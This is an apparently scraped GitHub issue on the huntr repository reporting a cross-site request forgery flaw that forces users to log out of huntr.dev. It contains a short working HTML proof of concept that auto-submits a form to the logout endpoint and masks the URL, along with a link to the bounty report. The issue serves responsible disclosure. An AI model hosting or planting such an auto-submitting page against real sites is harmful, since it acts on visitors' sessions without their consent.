[ CSFR ] Force logout user(s) via logout link

418sec / huntr

Public Roadmap | huntr.dev

https://huntr.dev

265 stars 90 forks source link

[ CSFR ] Force logout user(s) via logout link #2211

Open jaapmarcus opened 2 years ago

jaapmarcus commented 2 years ago

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://huntr.dev/auth/logout/">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

See https://huntr.dev/bounties/a7751b29-c607-42cf-899b-d498439d2770/

Might be worth patching